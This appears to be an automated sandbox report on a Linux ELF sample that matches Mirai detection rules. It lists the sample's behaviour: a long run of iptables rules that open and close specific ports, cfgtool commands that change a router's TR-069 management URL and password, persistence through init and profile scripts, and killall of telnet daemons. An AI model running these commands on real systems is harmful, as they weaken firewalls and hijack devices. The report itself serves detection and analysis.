Source: bin.sh.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
Source: bin.sh.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
Source: bin.sh.elf, type: SAMPLE	Matched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
Source: 6242.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
Source: 6240.1.00007fb730017000.00007fb730058000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16
Source: /usr/networks, type: DROPPED	Matched rule: Linux_Trojan_Mirai_5c62e6b2 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 39501003c45c89d6a08f71fbf9c442bcc952afc5f1a1eb7b5af2d4b7633698a8, id = 5c62e6b2-9f6a-4c6d-b3fc-c6cbc8cf0b4b, last_modified = 2021-09-16
Source: /usr/networks, type: DROPPED	Matched rule: Linux_Trojan_Mirai_77137320 reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = afeedf7fb287320c70a2889f43bc36a3047528204e1de45c4ac07898187d136b, id = 77137320-6c7e-4bb8-81a4-bd422049c309, last_modified = 2021-09-16
Source: /usr/networks, type: DROPPED	Matched rule: Linux_Trojan_Mirai_ac253e4f reference_sample = 91642663793bdda93928597ff1ac6087e4c1e5d020a8f40f2140e9471ab730f9, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = e2eee1f72b8c2dbf68e57b721c481a5cd85296e844059decc3548e7a6dc28fea, id = ac253e4f-b628-4dd0-91f1-f19099286992, last_modified = 2021-09-16

Source: classification engine

Classification label: mal100.spre.troj.evad.linELF@0/486@73/0

Persistence and Installation Behavior

Executes the "iptables" command to insert, remove and/or manipulate rules

Source: /bin/sh (PID: 6275)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6282)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6285)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6290)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6293)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6296)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6299)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6302)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6328)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6331)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6334)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6337)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6344)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6347)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6350)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6353)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6356)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6359)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6366)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6369)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6377)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6380)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6387)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6393)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP	Jump to behavior
Source: /bin/sh (PID: 6401)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --destination-port 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6404)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6407)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6414)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6420)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I INPUT -p udp --dport 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6426)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I OUTPUT -p udp --sport 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6432)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 60815 -j ACCEPT	Jump to behavior
Source: /bin/sh (PID: 6438)	Iptables executable using switch for changing the iptables rules: /usr/sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 60815 -j ACCEPT	Jump to behavior

Sample reads /proc/mounts (often used for finding a writable filesystem)

Source: /tmp/bin.sh.elf (PID: 6244)

File: /proc/6244/mounts

Jump to behavior

Sample tries to persist itself using /etc/profile

Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/profile.d/cedilla-portuguese.sh	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/profile.d/im-config_wayland.sh	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/profile.d/gawk.sh	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/profile.d/01-locale-fix.sh	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/profile.d/apps-bin-path.sh	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/profile.d/Z99-cloudinit-warnings.sh	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/profile.d/vte-2.91.sh	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/profile.d/Z97-byobu.sh	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/profile.d/Z99-cloud-locale-test.sh	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/profile.d/xdg_dirs_desktop_session.sh	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/profile.d/bash_completion.sh	Jump to behavior

Sample tries to persist itself using System V runlevels

Source: /tmp/bin.sh.elf (PID: 6244)

File: /etc/rcS.d/S95baby.sh

Jump to behavior

Sample tries to set files in /etc globally writable

Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/rcS.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)			Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	File: /etc/init.d/S95baby.sh (bits: - usr: rx grp: rx all: rwx)			Jump to behavior

Terminates several processes with shell command 'killall'

Source: /bin/sh (PID: 6252)

Killall command executed: killall -9 telnetd utelnetd scfgmgr

Jump to behavior

Source: /tmp/bin.sh.elf (PID: 6240)	File: /tmp/.ips	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	Directory: //run/speech-dispatcher/.cache	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	Directory: //home/saturnino/.mozilla	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	Directory: //home/saturnino/.cache	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	Directory: //home/saturnino/.gnupg	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	Directory: //home/saturnino/.config	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	Directory: //home/saturnino/.local	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	Directory: //etc/.java	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	Directory: //etc/.java/.systemPrefs	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6244)	Directory: //etc/skel/.config	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6253)	Directory: /tmp/.config	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6261)	Directory: /tmp/.config	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6265)	Directory: /tmp/.ips	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6265)	Directory: /tmp/.config	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6271)	Directory: /tmp/.config	Jump to behavior

Source: /tmp/bin.sh.elf (PID: 6240)

Empty hidden file: /tmp/.ips

Jump to behavior

Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1582/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/3088/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/230/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/110/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/231/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/111/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/232/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1579/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/112/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/233/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1699/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/113/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/234/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1335/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1698/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/114/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/235/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1334/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1576/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/2302/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/115/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/236/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/116/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/237/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/117/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/118/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/910/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/119/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/912/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/10/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/2307/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/11/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/918/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/12/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/6240/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/13/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/14/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/15/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/16/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/6244/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/17/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/18/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/6246/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1594/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/120/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/121/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1349/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/122/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/243/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/123/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/2/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/124/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/3/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/4/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/125/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/126/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1344/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1465/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1586/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/127/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/6/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/248/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/128/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/249/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1463/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/800/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/9/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/801/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/20/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/21/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1900/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/22/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/23/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/24/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/6133/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/25/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/26/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/27/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/28/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/29/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/491/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/250/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/130/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/251/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/252/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/132/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/253/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/254/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/255/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/256/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1599/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/257/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1477/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/379/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/258/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1476/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/259/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1475/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/936/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/30/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/2208/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/35/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1809/stat	Jump to behavior
Source: /usr/bin/killall (PID: 6252)	File opened: /proc/1494/stat	Jump to behavior

Source: /tmp/bin.sh.elf (PID: 6246)	Shell command executed: /bin/sh -c "killall -9 telnetd utelnetd scfgmgr"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6273)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 57285 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6280)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 57285 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6283)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 57285 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6288)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 57285 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6291)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 57285 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6294)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 57285 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6297)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 57285 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6300)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 57285 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6326)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6329)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6332)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6335)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6338)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6340)	Shell command executed: /bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6342)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6345)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6348)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6351)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6354)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6357)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6360)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6367)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6372)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6378)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6382)	Shell command executed: /bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6388)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6399)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --destination-port 60815 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6402)	Shell command executed: /bin/sh -c "iptables -I OUTPUT -p udp --source-port 60815 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6405)	Shell command executed: /bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 60815 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6408)	Shell command executed: /bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 60815 -j ACCEPT"	Jump to behavior
Source: /tmp/bin.sh.elf (PID: 6415)	Shell command executed: /bin/sh -c "iptables -I INPUT -p udp --dport 60815 -j ACCEPT"	Jump to behavior
